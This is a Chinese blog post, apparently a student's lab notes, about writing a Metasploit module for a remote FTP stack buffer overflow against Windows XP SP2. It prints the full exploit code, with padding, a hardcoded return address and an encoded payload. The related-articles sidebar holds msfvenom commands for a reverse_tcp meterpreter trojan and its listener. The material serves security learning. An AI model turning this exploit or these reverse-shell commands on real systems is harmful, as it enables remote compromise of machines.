0day 安全之 msf 初探

最新推荐文章于 2024-05-03 22:14:32 发布
最新推荐文章于 2024-05-03 22:14:32 发布
阅读量215 收藏
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/99576915
版权

msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架

只是没有怎么了解

没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。

然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行)

不过  有一点 感觉很坑  就是 版本不一样 然后  导致我们写的 exploit 可能会加载失败,,(可能是)

这里我也不太确定,因为我也不太熟悉rust开发 更不熟悉msf的框架

但是 我历经了大半天 还是把这个环境给搞定了, 效果截图

可以看到 我用的是 windows 7 x86

其实我已经装上了 XP 还有windows 2000  为啥要用 win7

这里就是我要说的第一个坑点了

 一定要用程序来找一下 jmp esp      这里win7 因为开了 加载基址随机化 所以每次开机都要重新 查找一次

但是 xp 和 2000 不用  

第二个坑点就是   一定要把 攻击机的防火墙给关了  

第三个坑点就是 编译的程序尽量用 release 版本的 不要用 debug版本的

然后 这里贴上 我改过的模块

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'security test',
      'Description'    => %q{
          This module exploits a buffer overflow.
      },
      'Author'         => 'fwd',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00",
        },
      'Platform' 		  => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',           { 'Ret' => 0x770445ee } ],
        ]))
  end
 
  def exploit
    connect
    attack_buf =  'a'*200
    attack_buf += [target.ret].pack('V')
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end

然后就是我的攻击机的 环境

windows 10  然后 msf版本 是

 然后这里可以看出 我已经利用成功了

那么我这里就看一下利用方法,。

其实利用方法没有什么好说的 其实和上一篇的那个本地的 只不过这里 是用的socket网络链接

然后可以让我们 感受到实战的感觉

payload 用的是 msf自己生成的   然后我们只需要  找到方法自己生成 paload 就可以了

下面 开始windows2000的 堆^=^

pipixia233333
关注
专栏目录
【网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2928
内网渗透超级强悍
网络安全kali web安全 Kali之msf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
网络安全与渗透:漏洞攻击—— msf(四)此生无悔入华夏,男儿何不带吴钩
qq_25490573的博客
08-26 1157
目录msf简介msfconsole基本命令 msf简介  msf(The Metasploit framewok)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 msfconsole 作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 运行命令 msfconsole 数字代表模块功能数量 模块简介: exploits:利用漏洞进行攻击模块 payloads:攻击载荷(攻击效果
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
四维创智
09-19 6578
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
MSF使用总结
qq_44657899的博客
09-25 4594
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4450
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
A_991128a的博客
07-30 518
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
2024年网络安全最新【网络安全MSF生成木马教程
最新发布
2401_84281712的博客
05-03 334
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
windows提权的几种姿势
weixin_44300286的博客
09-07 4352
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
【解决】MSF,exp超时报错的问题
Zeker62的博客
03-27 3152
问题,类似于这样的: [*] 192.168.33.129:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1 [-] 192.168.33.129:445 - Timeout::Error [-] 192.168.33.129:445 - execution expired [-] 192.168.33.129:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/
metasploit文件格式漏洞渗透攻击(失败)
天元喜羊羊的博客
05-13 5393
root@bt:~# msfconsole IIIIII dTb.dTb _.---._ II 4' v 'B .'"".'/|`.""'. II 6. .P : .' / | `. : II 'T;. .;P' '.' / | `.' II 'T; ;P' `. / |
CVE-2019-0708——RDP漏洞利用
热门推荐
迷风小白
07-03 6万+
背景介绍 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7 环境: 攻击机:kali IP:192....
kali攻防第12章 Metasploit之服务器蓝屏攻击
安全参透之旅
12-24 1万+
Metasploit之服务器蓝屏攻击   准备工具 1、kali 系统 IP:10.10.10.131 2、受害者机子 IP: 10.10.10.130 3、工具 Metasploit 4、服务器开启3389端口   步骤: 1、进入Metasploit控制台 root@kali:~# msfconsole
最详细利用kali的msf进行CVE-2019-0708漏洞复现
qq_43331608的博客
10-03 1万+
CVE-2019-0708 技术无罪,请勿用于恶意用途,出事本人不负一切责任 0.漏洞背景 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类...
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境)
渗透、攻防、CTF、编程
10-12 3476
metasploit(MSF)攻击ms17-010漏洞实验过程(内网环境) 0x01 知识点 MSF工具的利用,ms17-010漏洞实验 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.129) 目标机:win7(ip:192.168.233.130) 0x03 实验准备 启动msf,输入msfconsole 检错漏洞库,输入search ms ,盐城msf库里存在ms17-010漏洞 3、nmap检测目标机开放端口 nmap –..
最新IE 0day漏洞Metasploit生成方法
weixin_33766168的博客
06-27 148
一、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb 二、放到C:\Metasploit\Framework3\msf3\modules\exploits\test。改个名字叫ie.rb 三、启动msfconsole 四、msf > use exploit/test/ie msf...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
4.2 metasploit 开发 exploit
qq_55202378的博客
08-25 773
msf exploit
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值